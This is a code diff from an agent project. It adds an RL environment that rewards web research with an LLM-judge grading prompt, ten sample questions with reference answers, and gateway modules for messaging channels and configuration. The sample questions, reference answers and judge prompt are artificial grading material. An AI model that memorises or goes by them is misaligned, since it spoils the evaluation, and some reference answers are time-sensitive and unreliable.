logger.debug("Browser cleanup for task %s: %s", self.task_id, e)
finally:
if _prev_quiet is None:
os.environ.pop("HERMES_QUIET", None)
else:
os.environ["HERMES_QUIET"] = _prev_quiet

View File

@@ -0,0 +1,718 @@
"""
WebResearchEnv — RL Environment for Multi-Step Web Research
============================================================
Trains models to do accurate, efficient, multi-source web research.
Reward signals:
- Answer correctness (LLM judge, 0.01.0)
- Source diversity (used ≥2 distinct domains)
- Efficiency (penalizes excessive tool calls)
- Tool usage (bonus for actually using web tools)
Dataset: FRAMES benchmark (Google, 2024) — multi-hop factual questions
HuggingFace: google/frames-benchmark
Fallback: built-in sample questions (no HF token needed)
Usage:
# Phase 1 (OpenAI-compatible server)
python environments/web_research_env.py serve \\
--openai.base_url http://localhost:8000/v1 \\
--openai.model_name YourModel \\
--openai.server_type openai
# Process mode (offline data generation)
python environments/web_research_env.py process \\
--env.data_path_to_save_groups data/web_research.jsonl
# Standalone eval
python environments/web_research_env.py evaluate \\
--openai.base_url http://localhost:8000/v1 \\
--openai.model_name YourModel
Built by: github.com/jackx707
Inspired by: GroceryMind — production Hermes agent doing live web research
across German grocery stores (firecrawl + hermes-agent)
"""
from __future__ import annotations
import asyncio
import json
import logging
import os
import random
import re
import sys
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
from urllib.parse import urlparse
from pydantic import Field
# Ensure hermes-agent root is on path
_repo_root = Path(__file__).resolve().parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
# ---------------------------------------------------------------------------
# Optional HuggingFace datasets import
# ---------------------------------------------------------------------------
try:
from datasets import load_dataset
HF_AVAILABLE = True
except ImportError:
HF_AVAILABLE = False
from atroposlib.envs.base import ScoredDataGroup
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from atroposlib.type_definitions import Item
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
from environments.agent_loop import AgentResult
from environments.tool_context import ToolContext
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Fallback sample dataset (used when HuggingFace is unavailable)
# Multi-hop questions requiring real web search to answer.
# ---------------------------------------------------------------------------
SAMPLE_QUESTIONS = [
{
"question": "What is the current population of the capital city of the country that won the 2022 FIFA World Cup?",
"answer": "Buenos Aires has approximately 3 million people in the city proper, or around 15 million in the greater metro area.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "Who is the CEO of the company that makes the most widely used open-source container orchestration platform?",
"answer": "The Linux Foundation oversees Kubernetes. CNCF (Cloud Native Computing Foundation) is the specific body — it does not have a traditional CEO but has an executive director.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "What programming language was used to write the original version of the web framework used by Instagram?",
"answer": "Django, which Instagram was built on, is written in Python.",
"difficulty": "easy",
"hops": 2,
},
{
"question": "In what year was the university founded where the inventor of the World Wide Web currently holds a professorship?",
"answer": "Tim Berners-Lee holds a professorship at MIT (founded 1861) and the University of Southampton (founded 1952).",
"difficulty": "hard",
"hops": 3,
},
{
"question": "What is the latest stable version of the programming language that ranks #1 on the TIOBE index as of this year?",
"answer": "Python is currently #1 on TIOBE. The latest stable version should be verified via the official python.org site.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "How many employees does the parent company of Instagram have?",
"answer": "Meta Platforms (parent of Instagram) employs approximately 70,000+ people as of recent reports.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "What is the current interest rate set by the central bank of the country where the Eiffel Tower is located?",
"answer": "The European Central Bank sets rates for France/eurozone. The current rate should be verified — it has changed frequently in 2023-2025.",
"difficulty": "hard",
"hops": 2,
},
{
"question": "Which company acquired the startup founded by the creator of Oculus VR?",
"answer": "Palmer Luckey founded Oculus VR, which was acquired by Facebook (now Meta). He later founded Anduril Industries.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "What is the market cap of the company that owns the most popular search engine in Russia?",
"answer": "Yandex (now split into separate entities after 2024 restructuring). Current market cap should be verified via financial sources.",
"difficulty": "hard",
"hops": 2,
},
{
"question": "What was the GDP growth rate of the country that hosted the most recent Summer Olympics?",
"answer": "Paris, France hosted the 2024 Summer Olympics. France's recent GDP growth should be verified via World Bank or IMF data.",
"difficulty": "hard",
"hops": 2,
},
]
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
class WebResearchEnvConfig(HermesAgentEnvConfig):
"""Configuration for the web research RL environment."""
# Reward weights
correctness_weight: float = Field(
default=0.6,
description="Weight for answer correctness in reward (LLM judge score).",
)
tool_usage_weight: float = Field(
default=0.2,
description="Weight for tool usage signal (did the model actually use web tools?).",
)
efficiency_weight: float = Field(
default=0.2,
description="Weight for efficiency signal (penalizes excessive tool calls).",
)
diversity_bonus: float = Field(
default=0.1,
description="Bonus reward for citing ≥2 distinct domains.",
)
# Efficiency thresholds
efficient_max_calls: int = Field(
default=5,
description="Maximum tool calls before efficiency penalty begins.",
)
heavy_penalty_calls: int = Field(
default=10,
description="Tool call count where efficiency penalty steepens.",
)
# Eval
eval_size: int = Field(
default=20,
description="Number of held-out items for evaluation.",
)
eval_split_ratio: float = Field(
default=0.1,
description="Fraction of dataset to hold out for evaluation (0.01.0).",
)
# Dataset
dataset_name: str = Field(
default="google/frames-benchmark",
description="HuggingFace dataset name for research questions.",
)
# ---------------------------------------------------------------------------
# Environment
# ---------------------------------------------------------------------------
class WebResearchEnv(HermesAgentBaseEnv):
"""
RL environment for training multi-step web research skills.
The model is given a factual question requiring 2-3 hops of web research
and must use web_search / web_extract tools to find and synthesize the answer.
Reward is multi-signal:
60% — answer correctness (LLM judge)
20% — tool usage (did the model actually search the web?)
20% — efficiency (penalizes >5 tool calls)
Bonus +0.1 for source diversity (≥2 distinct domains cited).
"""
name = "web-research"
env_config_cls = WebResearchEnvConfig
# Default toolsets for this environment — web + file for saving notes
default_toolsets = ["web", "file"]
@classmethod
def config_init(cls) -> Tuple[WebResearchEnvConfig, List[APIServerConfig]]:
"""Default configuration for the web research environment."""
env_config = WebResearchEnvConfig(
enabled_toolsets=["web", "file"],
max_agent_turns=15,
agent_temperature=1.0,
system_prompt=(
"You are a highly capable research agent. When asked a factual question, "
"always use web_search to find current, accurate information before answering. "
"Cite at least 2 sources. Be concise and accurate."
),
group_size=4,
total_steps=1000,
steps_per_eval=100,
use_wandb=True,
wandb_name="web-research",
)
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-sonnet-4.5",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False,
)
]
return env_config, server_configs
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._items: list[dict] = []
self._eval_items: list[dict] = []
self._index: int = 0
# Metrics tracking for wandb
self._reward_buffer: list[float] = []
self._correctness_buffer: list[float] = []
self._tool_usage_buffer: list[float] = []
self._efficiency_buffer: list[float] = []
self._diversity_buffer: list[float] = []
# ------------------------------------------------------------------
# 1. Setup — load dataset
# ------------------------------------------------------------------
async def setup(self) -> None:
"""Load the FRAMES benchmark or fall back to built-in samples."""
if HF_AVAILABLE:
try:
logger.info("Loading FRAMES benchmark from HuggingFace...")
ds = load_dataset(self.config.dataset_name, split="test")
self._items = [
{
"question": row["Prompt"],
"answer": row["Answer"],
"difficulty": row.get("reasoning_types", "unknown"),
"hops": 2,
}
for row in ds
]
# Hold out for eval
eval_size = max(
self.config.eval_size,
int(len(self._items) * self.config.eval_split_ratio),
)
random.shuffle(self._items)
self._eval_items = self._items[:eval_size]
self._items = self._items[eval_size:]
logger.info(
f"Loaded {len(self._items)} train / {len(self._eval_items)} eval items "
f"from FRAMES benchmark."
)
return
except Exception as e:
logger.warning(f"Could not load FRAMES from HuggingFace: {e}. Using built-in samples.")
# Fallback
random.shuffle(SAMPLE_QUESTIONS)
split = max(1, len(SAMPLE_QUESTIONS) * 8 // 10)
self._items = SAMPLE_QUESTIONS[:split]
self._eval_items = SAMPLE_QUESTIONS[split:]
logger.info(
f"Using built-in sample dataset: {len(self._items)} train / "
f"{len(self._eval_items)} eval items."
)
# ------------------------------------------------------------------
# 2. get_next_item — return the next question
# ------------------------------------------------------------------
async def get_next_item(self) -> dict:
"""Return the next item, cycling through the dataset."""
if not self._items:
raise RuntimeError("Dataset is empty. Did you call setup()?")
item = self._items[self._index % len(self._items)]
self._index += 1
return item
# ------------------------------------------------------------------
# 3. format_prompt — build the user-facing prompt
# ------------------------------------------------------------------
def format_prompt(self, item: dict) -> str:
"""Format the research question as a task prompt."""
return (
f"Research the following question thoroughly using web search. "
f"You MUST search the web to find current, accurate information — "
f"do not rely solely on your training data.\n\n"
f"Question: {item['question']}\n\n"
f"Requirements:\n"
f"- Use web_search and/or web_extract tools to find information\n"
f"- Search at least 2 different sources\n"
f"- Provide a concise, accurate answer (2-4 sentences)\n"
f"- Cite the sources you used"
)
# ------------------------------------------------------------------
# 4. compute_reward — multi-signal scoring
# ------------------------------------------------------------------
async def compute_reward(
self,
item: dict,
result: AgentResult,
ctx: ToolContext,
) -> float:
"""
Multi-signal reward function:
correctness_weight * correctness — LLM judge comparing answer to ground truth
tool_usage_weight * tool_used — binary: did the model use web tools?
efficiency_weight * efficiency — penalizes wasteful tool usage
+ diversity_bonus — source diversity (≥2 distinct domains)
"""
# Extract final response from messages (last assistant message with content)
final_response = ""
tools_used: list[str] = []
for msg in reversed(result.messages):
if msg.get("role") == "assistant" and msg.get("content") and not final_response:
final_response = msg["content"]
# Collect tool names from tool call messages
if msg.get("role") == "assistant" and msg.get("tool_calls"):
for tc in msg["tool_calls"]:
fn = tc.get("function", {}) if isinstance(tc, dict) else {}
name = fn.get("name", "")
if name:
tools_used.append(name)
tool_call_count: int = result.turns_used or len(tools_used)
cfg = self.config
# ---- Signal 1: Answer correctness (LLM judge) ----------------
correctness = await self._llm_judge(
question=item["question"],
expected=item["answer"],
model_answer=final_response,
)
# ---- Signal 2: Web tool usage --------------------------------
web_tools = {"web_search", "web_extract", "search", "firecrawl"}
tool_used = 1.0 if any(t in web_tools for t in tools_used) else 0.0
# ---- Signal 3: Efficiency ------------------------------------
if tool_call_count <= cfg.efficient_max_calls:
efficiency = 1.0
elif tool_call_count <= cfg.heavy_penalty_calls:
efficiency = 1.0 - (tool_call_count - cfg.efficient_max_calls) * 0.08
else:
efficiency = max(0.0, 1.0 - (tool_call_count - cfg.efficient_max_calls) * 0.12)
# ---- Bonus: Source diversity ---------------------------------
domains = self._extract_domains(final_response)
diversity = cfg.diversity_bonus if len(domains) >= 2 else 0.0
# ---- Combine ------------------------------------------------
reward = (
cfg.correctness_weight * correctness
+ cfg.tool_usage_weight * tool_used
+ cfg.efficiency_weight * efficiency
+ diversity
)
reward = min(1.0, max(0.0, reward)) # clamp to [0, 1]
# Track for wandb
self._reward_buffer.append(reward)
self._correctness_buffer.append(correctness)
self._tool_usage_buffer.append(tool_used)
self._efficiency_buffer.append(efficiency)
self._diversity_buffer.append(diversity)
logger.debug(
f"Reward breakdown — correctness={correctness:.2f}, "
f"tool_used={tool_used:.1f}, efficiency={efficiency:.2f}, "
f"diversity={diversity:.1f} → total={reward:.3f}"
)
return reward
# ------------------------------------------------------------------
# 5. evaluate — run on held-out eval split
# ------------------------------------------------------------------
async def evaluate(self, *args, **kwargs) -> None:
"""Run evaluation on the held-out split using the full agent loop with tools.
Each eval item runs through the same agent loop as training —
the model can use web_search, web_extract, etc. to research answers.
This measures actual agentic research capability, not just knowledge.
"""
import time
import uuid
from environments.agent_loop import HermesAgentLoop
from environments.tool_context import ToolContext
items = self._eval_items
if not items:
logger.warning("No eval items available.")
return
eval_size = min(self.config.eval_size, len(items))
eval_items = items[:eval_size]
logger.info(f"Running eval on {len(eval_items)} questions (with agent loop + tools)...")
start_time = time.time()
samples = []
# Resolve tools once for all eval items
tools, valid_names = self._resolve_tools_for_group()
for i, item in enumerate(eval_items):
task_id = str(uuid.uuid4())
logger.info(f"Eval [{i+1}/{len(eval_items)}]: {item['question'][:80]}...")
try:
# Build messages
messages: List[Dict[str, Any]] = []
if self.config.system_prompt:
messages.append({"role": "system", "content": self.config.system_prompt})
messages.append({"role": "user", "content": self.format_prompt(item)})
# Run the full agent loop with tools
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=0.0, # Deterministic for eval
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
# Extract final response and tool usage from messages
final_response = ""
tool_call_count = 0
for msg in reversed(result.messages):
if msg.get("role") == "assistant" and msg.get("content") and not final_response:
final_response = msg["content"]
if msg.get("role") == "assistant" and msg.get("tool_calls"):
tool_call_count += len(msg["tool_calls"])
# Compute reward (includes LLM judge for correctness)
# Temporarily save buffer lengths so we can extract the
# correctness score without calling judge twice, and avoid
# polluting training metric buffers with eval data.
buf_len = len(self._correctness_buffer)
ctx = ToolContext(task_id)
try:
reward = await self.compute_reward(item, result, ctx)
finally:
ctx.cleanup()
# Extract correctness from the buffer (compute_reward appended it)
# then remove eval entries from training buffers
correctness = (
self._correctness_buffer[buf_len]
if len(self._correctness_buffer) > buf_len
else 0.0
)
# Roll back buffers to avoid polluting training metrics
for buf in (
self._reward_buffer, self._correctness_buffer,
self._tool_usage_buffer, self._efficiency_buffer,
self._diversity_buffer,
):
if len(buf) > buf_len:
buf.pop()
samples.append({
"prompt": item["question"],
"response": final_response[:500],
"expected": item["answer"],
"correctness": correctness,
"reward": reward,
"tool_calls": tool_call_count,
"turns": result.turns_used,
})
logger.info(
f" → correctness={correctness:.2f}, reward={reward:.3f}, "
f"tools={tool_call_count}, turns={result.turns_used}"
)
except Exception as e:
logger.error(f"Eval error on item: {e}")
samples.append({
"prompt": item["question"],
"response": f"ERROR: {e}",
"expected": item["answer"],
"correctness": 0.0,
"reward": 0.0,
"tool_calls": 0,
"turns": 0,
})
end_time = time.time()
# Compute aggregate metrics
correctness_scores = [s["correctness"] for s in samples]
rewards = [s["reward"] for s in samples]
tool_counts = [s["tool_calls"] for s in samples]
n = len(samples)
eval_metrics = {
"eval/mean_correctness": sum(correctness_scores) / n if n else 0.0,
"eval/mean_reward": sum(rewards) / n if n else 0.0,
"eval/mean_tool_calls": sum(tool_counts) / n if n else 0.0,
"eval/tool_usage_rate": sum(1 for t in tool_counts if t > 0) / n if n else 0.0,
"eval/n_items": n,
}
logger.info(
f"Eval complete — correctness={eval_metrics['eval/mean_correctness']:.3f}, "
f"reward={eval_metrics['eval/mean_reward']:.3f}, "
f"tool_usage={eval_metrics['eval/tool_usage_rate']:.0%}"
)
await self.evaluate_log(
metrics=eval_metrics,
samples=samples,
start_time=start_time,
end_time=end_time,
)
# ------------------------------------------------------------------
# 6. wandb_log — custom metrics
# ------------------------------------------------------------------
async def wandb_log(self, wandb_metrics: Optional[Dict] = None) -> None:
"""Log reward breakdown metrics to wandb."""
if wandb_metrics is None:
wandb_metrics = {}
if self._reward_buffer:
n = len(self._reward_buffer)
wandb_metrics["train/mean_reward"] = sum(self._reward_buffer) / n
wandb_metrics["train/mean_correctness"] = sum(self._correctness_buffer) / n
wandb_metrics["train/mean_tool_usage"] = sum(self._tool_usage_buffer) / n
wandb_metrics["train/mean_efficiency"] = sum(self._efficiency_buffer) / n
wandb_metrics["train/mean_diversity"] = sum(self._diversity_buffer) / n
wandb_metrics["train/total_rollouts"] = n
# Accuracy buckets
wandb_metrics["train/correct_rate"] = (
sum(1 for c in self._correctness_buffer if c >= 0.7) / n
)
wandb_metrics["train/tool_usage_rate"] = (
sum(1 for t in self._tool_usage_buffer if t > 0) / n
)
# Clear buffers
self._reward_buffer.clear()
self._correctness_buffer.clear()
self._tool_usage_buffer.clear()
self._efficiency_buffer.clear()
self._diversity_buffer.clear()
await super().wandb_log(wandb_metrics)
# ------------------------------------------------------------------
# Private helpers
# ------------------------------------------------------------------
async def _llm_judge(
self,
question: str,
expected: str,
model_answer: str,
) -> float:
"""
Use the server's LLM to judge answer correctness.
Falls back to keyword heuristic if LLM call fails.
"""
if not model_answer or not model_answer.strip():
return 0.0
judge_prompt = (
"You are an impartial judge evaluating the quality of an AI research answer.\n\n"
f"Question: {question}\n\n"
f"Reference answer: {expected}\n\n"
f"Model answer: {model_answer}\n\n"
"Score the model answer on a scale from 0.0 to 1.0 where:\n"
" 1.0 = fully correct and complete\n"
" 0.7 = mostly correct with minor gaps\n"
" 0.4 = partially correct\n"
" 0.1 = mentions relevant topic but wrong or very incomplete\n"
" 0.0 = completely wrong or no answer\n\n"
"Consider: factual accuracy, completeness, and relevance.\n"
'Respond with ONLY a JSON object: {"score": <float>, "reason": "<one sentence>"}'
)
try:
response = await self.server.chat_completion(
messages=[{"role": "user", "content": judge_prompt}],
n=1,
max_tokens=150,
temperature=0.0,
split="eval",
)
text = response.choices[0].message.content if response.choices else ""
parsed = self._parse_judge_json(text)
if parsed is not None:
return float(parsed)
except Exception as e:
logger.debug(f"LLM judge failed: {e}. Using heuristic.")
return self._heuristic_score(expected, model_answer)
@staticmethod
def _parse_judge_json(text: str) -> Optional[float]:
"""Extract the score float from LLM judge JSON response."""
try:
clean = re.sub(r"```(?:json)?|```", "", text).strip()
data = json.loads(clean)
score = float(data.get("score", -1))
if 0.0 <= score <= 1.0:
return score
except Exception:
match = re.search(r'"score"\s*:\s*([0-9.]+)', text)
if match:
score = float(match.group(1))
if 0.0 <= score <= 1.0:
return score
return None
@staticmethod
def _heuristic_score(expected: str, model_answer: str) -> float:
"""Lightweight keyword overlap score as fallback."""
stopwords = {
"the", "a", "an", "is", "are", "was", "were", "of", "in", "on",
"at", "to", "for", "with", "and", "or", "but", "it", "its",
"this", "that", "as", "by", "from", "be", "has", "have", "had",
}
def tokenize(text: str) -> set:
tokens = re.findall(r'\b\w+\b', text.lower())
return {t for t in tokens if t not in stopwords and len(t) > 2}
expected_tokens = tokenize(expected)
answer_tokens = tokenize(model_answer)
if not expected_tokens:
return 0.5
overlap = len(expected_tokens & answer_tokens)
union = len(expected_tokens | answer_tokens)
jaccard = overlap / union if union > 0 else 0.0
recall = overlap / len(expected_tokens)
return min(1.0, 0.4 * jaccard + 0.6 * recall)
@staticmethod
def _extract_domains(text: str) -> set:
"""Extract unique domains from URLs cited in the response."""
urls = re.findall(r'https?://[^\s\)>\]"\']+', text)
domains = set()
for url in urls:
try:
parsed = urlparse(url)
domain = parsed.netloc.lower().lstrip("www.")
if domain:
domains.add(domain)
except Exception:
pass
return domains
# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------
if __name__ == "__main__":
WebResearchEnv.cli()

35
gateway/__init__.py Normal file
View File

@@ -0,0 +1,35 @@
"""
Hermes Gateway - Multi-platform messaging integration.
This module provides a unified gateway for connecting the Hermes agent
to various messaging platforms (Telegram, Discord, WhatsApp) with:
- Session management (persistent conversations with reset policies)
- Dynamic context injection (agent knows where messages come from)
- Delivery routing (cron job outputs to appropriate channels)
- Platform-specific toolsets (different capabilities per platform)
"""
from .config import GatewayConfig, PlatformConfig, HomeChannel, load_gateway_config
from .session import (
SessionContext,
SessionStore,
SessionResetPolicy,
build_session_context_prompt,
)
from .delivery import DeliveryRouter, DeliveryTarget
__all__ = [
# Config
"GatewayConfig",
"PlatformConfig",
"HomeChannel",
"load_gateway_config",
# Session
"SessionContext",
"SessionStore",
"SessionResetPolicy",
"build_session_context_prompt",
# Delivery
"DeliveryRouter",
"DeliveryTarget",
]

View File

@@ -0,0 +1,258 @@
"""
Channel directory -- cached map of reachable channels/contacts per platform.
Built on gateway startup, refreshed periodically (every 5 min), and saved to
~/.hermes/channel_directory.json. The send_message tool reads this file for
action="list" and for resolving human-friendly channel names to numeric IDs.
"""
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
DIRECTORY_PATH = Path.home() / ".hermes" / "channel_directory.json"
def _session_entry_id(origin: Dict[str, Any]) -> Optional[str]:
chat_id = origin.get("chat_id")
if not chat_id:
return None
thread_id = origin.get("thread_id")
if thread_id:
return f"{chat_id}:{thread_id}"
return str(chat_id)
def _session_entry_name(origin: Dict[str, Any]) -> str:
base_name = origin.get("chat_name") or origin.get("user_name") or str(origin.get("chat_id"))
thread_id = origin.get("thread_id")
if not thread_id:
return base_name
topic_label = origin.get("chat_topic") or f"topic {thread_id}"
return f"{base_name} / {topic_label}"
# ---------------------------------------------------------------------------
# Build / refresh
# ---------------------------------------------------------------------------
def build_channel_directory(adapters: Dict[Any, Any]) -> Dict[str, Any]:
"""
Build a channel directory from connected platform adapters and session data.
Returns the directory dict and writes it to DIRECTORY_PATH.
"""
from gateway.config import Platform
platforms: Dict[str, List[Dict[str, str]]] = {}
for platform, adapter in adapters.items():
try:
if platform == Platform.DISCORD:
platforms["discord"] = _build_discord(adapter)
elif platform == Platform.SLACK:
platforms["slack"] = _build_slack(adapter)
except Exception as e:
logger.warning("Channel directory: failed to build %s: %s", platform.value, e)
# Telegram, WhatsApp & Signal can't enumerate chats -- pull from session history
for plat_name in ("telegram", "whatsapp", "signal", "email"):
if plat_name not in platforms:
platforms[plat_name] = _build_from_sessions(plat_name)
directory = {
"updated_at": datetime.now().isoformat(),
"platforms": platforms,
}
try:
DIRECTORY_PATH.parent.mkdir(parents=True, exist_ok=True)
with open(DIRECTORY_PATH, "w", encoding="utf-8") as f:
json.dump(directory, f, indent=2, ensure_ascii=False)
except Exception as e:
logger.warning("Channel directory: failed to write: %s", e)
return directory
def _build_discord(adapter) -> List[Dict[str, str]]:
"""Enumerate all text channels the Discord bot can see."""
channels = []
client = getattr(adapter, "_client", None)
if not client:
return channels
try:
import discord as _discord
except ImportError:
return channels
for guild in client.guilds:
for ch in guild.text_channels:
channels.append({
"id": str(ch.id),
"name": ch.name,
"guild": guild.name,
"type": "channel",
})
# Also include DM-capable users we've interacted with is not
# feasible via guild enumeration; those come from sessions.
# Merge any DMs from session history
channels.extend(_build_from_sessions("discord"))
return channels
def _build_slack(adapter) -> List[Dict[str, str]]:
"""List Slack channels the bot has joined."""
channels = []
# Slack adapter may expose a web client
client = getattr(adapter, "_app", None) or getattr(adapter, "_client", None)
if not client:
return _build_from_sessions("slack")
try:
import asyncio
from tools.send_message_tool import _send_slack # noqa: F401
# Use the Slack Web API directly if available
except Exception:
pass
# Fallback to session data
return _build_from_sessions("slack")
def _build_from_sessions(platform_name: str) -> List[Dict[str, str]]:
"""Pull known channels/contacts from sessions.json origin data."""
sessions_path = Path.home() / ".hermes" / "sessions" / "sessions.json"
if not sessions_path.exists():
return []
entries = []
try:
with open(sessions_path, encoding="utf-8") as f:
data = json.load(f)
seen_ids = set()
for _key, session in data.items():
origin = session.get("origin") or {}
if origin.get("platform") != platform_name:
continue
entry_id = _session_entry_id(origin)
if not entry_id or entry_id in seen_ids:
continue
seen_ids.add(entry_id)
entries.append({
"id": entry_id,
"name": _session_entry_name(origin),
"type": session.get("chat_type", "dm"),
"thread_id": origin.get("thread_id"),
})
except Exception as e:
logger.debug("Channel directory: failed to read sessions for %s: %s", platform_name, e)
return entries
# ---------------------------------------------------------------------------
# Read / resolve
# ---------------------------------------------------------------------------
def load_directory() -> Dict[str, Any]:
"""Load the cached channel directory from disk."""
if not DIRECTORY_PATH.exists():
return {"updated_at": None, "platforms": {}}
try:
with open(DIRECTORY_PATH, encoding="utf-8") as f:
return json.load(f)
except Exception:
return {"updated_at": None, "platforms": {}}
def resolve_channel_name(platform_name: str, name: str) -> Optional[str]:
"""
Resolve a human-friendly channel name to a numeric ID.
Matching strategy (case-insensitive, first match wins):
- Discord: "bot-home", "#bot-home", "GuildName/bot-home"
- Telegram: display name or group name
- Slack: "engineering", "#engineering"
"""
directory = load_directory()
channels = directory.get("platforms", {}).get(platform_name, [])
if not channels:
return None
query = name.lstrip("#").lower()
# 1. Exact name match
for ch in channels:
if ch["name"].lower() == query:
return ch["id"]
# 2. Guild-qualified match for Discord ("GuildName/channel")
if "/" in query:
guild_part, ch_part = query.rsplit("/", 1)
for ch in channels:
guild = ch.get("guild", "").lower()
if guild == guild_part and ch["name"].lower() == ch_part:
return ch["id"]
# 3. Partial prefix match (only if unambiguous)
matches = [ch for ch in channels if ch["name"].lower().startswith(query)]
if len(matches) == 1:
return matches[0]["id"]
return None
def format_directory_for_display() -> str:
"""Format the channel directory as a human-readable list for the model."""
directory = load_directory()
platforms = directory.get("platforms", {})
if not any(platforms.values()):
return "No messaging platforms connected or no channels discovered yet."
lines = ["Available messaging targets:\n"]
for plat_name, channels in sorted(platforms.items()):
if not channels:
continue
# Group Discord channels by guild
if plat_name == "discord":
guilds: Dict[str, List] = {}
dms: List = []
for ch in channels:
guild = ch.get("guild")
if guild:
guilds.setdefault(guild, []).append(ch)
else:
dms.append(ch)
for guild_name, guild_channels in sorted(guilds.items()):
lines.append(f"Discord ({guild_name}):")
for ch in sorted(guild_channels, key=lambda c: c["name"]):
lines.append(f" discord:#{ch['name']}")
if dms:
lines.append("Discord (DMs):")
for ch in dms:
lines.append(f" discord:{ch['name']}")
lines.append("")
else:
lines.append(f"{plat_name.title()}:")
for ch in channels:
type_label = f" ({ch['type']})" if ch.get("type") else ""
lines.append(f" {plat_name}:{ch['name']}{type_label}")
lines.append("")
lines.append('Use these as the "target" parameter when sending.')
lines.append('Bare platform name (e.g. "telegram") sends to home channel.')
return "\n".join(lines)

485
gateway/config.py Normal file
View File

@@ -0,0 +1,485 @@
"""
Gateway configuration management.
Handles loading and validating configuration for:
- Connected platforms (Telegram, Discord, WhatsApp)
- Home channels for each platform
- Session reset policies
- Delivery preferences
"""
import logging
import os
import json
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any
from enum import Enum
logger = logging.getLogger(__name__)
class Platform(Enum):
"""Supported messaging platforms."""
LOCAL = "local"
TELEGRAM = "telegram"
DISCORD = "discord"
WHATSAPP = "whatsapp"
SLACK = "slack"
SIGNAL = "signal"
HOMEASSISTANT = "homeassistant"
EMAIL = "email"
@dataclass
class HomeChannel:
"""
Default destination for a platform.
When a cron job specifies deliver="telegram" without a specific chat ID,
messages are sent to this home channel.
"""
platform: Platform
chat_id: str
name: str # Human-readable name for display
def to_dict(self) -> Dict[str, Any]:
return {
"platform": self.platform.value,
"chat_id": self.chat_id,
"name": self.name,
}
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "HomeChannel":
return cls(
platform=Platform(data["platform"]),
chat_id=str(data["chat_id"]),
name=data.get("name", "Home"),
)
@dataclass
class SessionResetPolicy:
"""
Controls when sessions reset (lose context).
Modes:
- "daily": Reset at a specific hour each day
- "idle": Reset after N minutes of inactivity
- "both": Whichever triggers first (daily boundary OR idle timeout)
- "none": Never auto-reset (context managed only by compression)
"""
mode: str = "both" # "daily", "idle", "both", or "none"
at_hour: int = 4 # Hour for daily reset (0-23, local time)
idle_minutes: int = 1440 # Minutes of inactivity before reset (24 hours)
def to_dict(self) -> Dict[str, Any]:
return {
"mode": self.mode,
"at_hour": self.at_hour,
"idle_minutes": self.idle_minutes,
}
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "SessionResetPolicy":
return cls(
mode=data.get("mode", "both"),
at_hour=data.get("at_hour", 4),
idle_minutes=data.get("idle_minutes", 1440),
)
@dataclass
class PlatformConfig:
"""Configuration for a single messaging platform."""
enabled: bool = False
token: Optional[str] = None # Bot token (Telegram, Discord)
api_key: Optional[str] = None # API key if different from token
home_channel: Optional[HomeChannel] = None
# Platform-specific settings
extra: Dict[str, Any] = field(default_factory=dict)
def to_dict(self) -> Dict[str, Any]:
result = {
"enabled": self.enabled,
"extra": self.extra,
}
if self.token:
result["token"] = self.token
if self.api_key:
result["api_key"] = self.api_key
if self.home_channel:
result["home_channel"] = self.home_channel.to_dict()
return result
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "PlatformConfig":
home_channel = None
if "home_channel" in data:
home_channel = HomeChannel.from_dict(data["home_channel"])
return cls(
enabled=data.get("enabled", False),
token=data.get("token"),
api_key=data.get("api_key"),
home_channel=home_channel,
extra=data.get("extra", {}),
)
@dataclass
class GatewayConfig:
"""
Main gateway configuration.
Manages all platform connections, session policies, and delivery settings.
"""
# Platform configurations
platforms: Dict[Platform, PlatformConfig] = field(default_factory=dict)
# Session reset policies by type
default_reset_policy: SessionResetPolicy = field(default_factory=SessionResetPolicy)
reset_by_type: Dict[str, SessionResetPolicy] = field(default_factory=dict)
reset_by_platform: Dict[Platform, SessionResetPolicy] = field(default_factory=dict)
# Reset trigger commands
reset_triggers: List[str] = field(default_factory=lambda: ["/new", "/reset"])
# Storage paths
sessions_dir: Path = field(default_factory=lambda: Path.home() / ".hermes" / "sessions")
# Delivery settings
always_log_local: bool = True # Always save cron outputs to local files
def get_connected_platforms(self) -> List[Platform]:
"""Return list of platforms that are enabled and configured."""
connected = []
for platform, config in self.platforms.items():
if not config.enabled:
continue
# Platforms that use token/api_key auth
if config.token or config.api_key:
connected.append(platform)
# WhatsApp uses enabled flag only (bridge handles auth)
elif platform == Platform.WHATSAPP:
connected.append(platform)
# Signal uses extra dict for config (http_url + account)
elif platform == Platform.SIGNAL and config.extra.get("http_url"):
connected.append(platform)
# Email uses extra dict for config (address + imap_host + smtp_host)
elif platform == Platform.EMAIL and config.extra.get("address"):
connected.append(platform)
return connected
def get_home_channel(self, platform: Platform) -> Optional[HomeChannel]:
"""Get the home channel for a platform."""
config = self.platforms.get(platform)
if config:
return config.home_channel
return None
def get_reset_policy(
self,
platform: Optional[Platform] = None,
session_type: Optional[str] = None
) -> SessionResetPolicy:
"""
Get the appropriate reset policy for a session.
Priority: platform override > type override > default
"""
# Platform-specific override takes precedence
if platform and platform in self.reset_by_platform:
return self.reset_by_platform[platform]
# Type-specific override (dm, group, thread)
if session_type and session_type in self.reset_by_type:
